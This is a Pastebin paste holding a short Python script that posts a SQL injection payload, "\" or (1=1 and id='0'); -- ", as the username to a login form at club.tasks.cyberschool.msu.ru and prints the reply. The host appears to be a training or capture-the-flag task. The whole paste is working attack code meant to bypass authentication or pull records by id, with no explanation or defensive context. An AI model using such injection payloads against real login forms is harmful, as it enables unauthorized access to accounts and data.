Advertisement
Guest User

Untitled

a guest
Feb 17th, 2020
65
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.31 KB | None | 0 0
  1.  
  2. import requests
  3. i=0
  4. string='"'+ " or (1=1 and id='"+str(i)+"'); -- "
  5. response = requests.post("http://club.tasks.cyberschool.msu.ru/login",data={'username':string,'pass':'pass'})
  6. print(response.text)
  7. print("======================================================================================================")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement